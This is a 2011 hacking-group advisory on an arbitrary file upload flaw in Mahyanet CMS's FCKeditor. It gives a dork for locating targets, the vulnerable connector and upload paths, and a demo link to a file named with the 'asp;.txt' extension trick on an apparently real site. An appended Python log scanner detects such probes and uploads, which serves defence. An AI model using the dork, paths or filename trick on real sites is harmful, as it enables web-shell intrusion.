--------------------------------------------------------------------------------
@ Mahyanet Cms (FCKeditor) Arbitrary File Upload Vulnerability
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
@ Name: Mahyanet Cms (FCKeditor) Arbitrary File Upload Vulnerability
@ Vendor: http://mahyanet.com
@ Date: 2011-07-04
@ Author: Ashiyane Digital Security Team
@ Thanks to: 1337day.com,Securityreason.com,packetstormsecurity.com,Exploit-db.com
@ Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
@ Home: www.ashiyane.org/forums/
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Dork: intext:"Powered by : Mahyanet.com"
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[+] Vulnerabilities ~>

[+] Vulnerability: http://127.0.0.1/Mahyanet/fckeditor/editor/filemanager/connectors/test.html
[+] Uploaded Path: http://127.0.0.1/Mahyanet/fckeditor/editor/images/userfiles/file/[Your File]
[+] Demo : http://www.tanhadairy.com/fckeditor/editor/images/userfiles/file/he.asp;(1)(1).txt
--------------------------------------------------------------------------------
===========================================================================
@ Gr33tz:
@ Ashiyane Members :
@ BehroozIce,Q7,Virangar,Iman_taktaz,Keivan,Ali_eagle,ruin3r,Hijacker,Rz04
@ Taghva,M3QD4D,PrinceOfHacking,Hidden-Hunter,Root3r,elvator,unique2world
@ Gladiator,Wahid,Encoder,mmilad200,n3me3iz,Classic,r3d.z0n3,injector,fr0nk
@ mzhacker,zend,milad-bushehr,aliakh,__amir__,anti206
@ 1337 Member:
@ r0073r,Side^effects,r4dc0re,eidelweiss,SeeMe,agix,gunslinger
@ Sn!pEr.S!te,indoushka,Knockout,ZoRlu,AnT!-Tr0J4n,eXeSoul,
===========================================================================
<<./By XroGuE >>
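
Added example, not part of the original advisory: a log check a site owner can run to see whether the connector path or the upload directory named above has been touched, including names like the demo's where a script extension sits in front of a ';' and the name ends in .txt. The log layout (IP, method, URI, status), the extension list, the function names and the sample lines are assumptions made for this sketch.

```python
import re
from urllib.parse import unquote

# Path fragments taken from the advisory, lower-cased for matching.
CONNECTOR = "/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/fckeditor/editor/images/userfiles/"
# Script extension at the end of the name or directly before ';',
# as in the advisory's demo name "he.asp;(1)(1).txt".
SCRIPT_NAME = re.compile(r"\.(asp|aspx|asa|cer|php)(;|$)")
# Assumed log layout: client IP, method, URI, status.
LINE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) (?P<status>\d{3})$")

# Constructed sample log; addresses are documentation ranges and
# "placeholder-connector" is a placeholder, not a real FCKeditor file.
SAMPLE_LOG = """\
192.0.2.10 GET /Mahyanet/fckeditor/editor/filemanager/connectors/test.html 200
192.0.2.10 POST /Mahyanet/fckeditor/editor/filemanager/connectors/placeholder-connector?Type=File 200
192.0.2.10 GET /Mahyanet/fckeditor/editor/images/userfiles/file/he.asp%3B(1)(1).txt 200
198.51.100.7 GET /Mahyanet/fckeditor/editor/images/userfiles/file/logo.png 200
198.51.100.7 GET /Mahyanet/index.asp 200
"""

def classify(method, uri):
    """Return a finding label for one request, or None."""
    # Drop the query string first, then decode so %3B is seen as ';'.
    path = unquote(uri.split("?", 1)[0]).lower()
    if CONNECTOR in path:
        return "connector-post" if method == "POST" else "connector-probe"
    if UPLOAD_DIR in path and SCRIPT_NAME.search(path.rsplit("/", 1)[-1]):
        return "script-in-upload-dir"
    return None

def scan(log_text):
    """Return (ip, finding, uri) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m is None:
            continue  # not in the assumed layout
        finding = classify(m["method"], m["uri"])
        if finding:
            hits.append((m["ip"], finding, m["uri"]))
    return hits

if __name__ == "__main__":
    for ip, finding, uri in scan(SAMPLE_LOG):
        print(f"{finding:22} {ip:15} {uri}")
```

Any script-named file under the upload directory is worth triaging; removing the connectors' test.html and denying script execution in the userfiles directory closes the path the advisory shows.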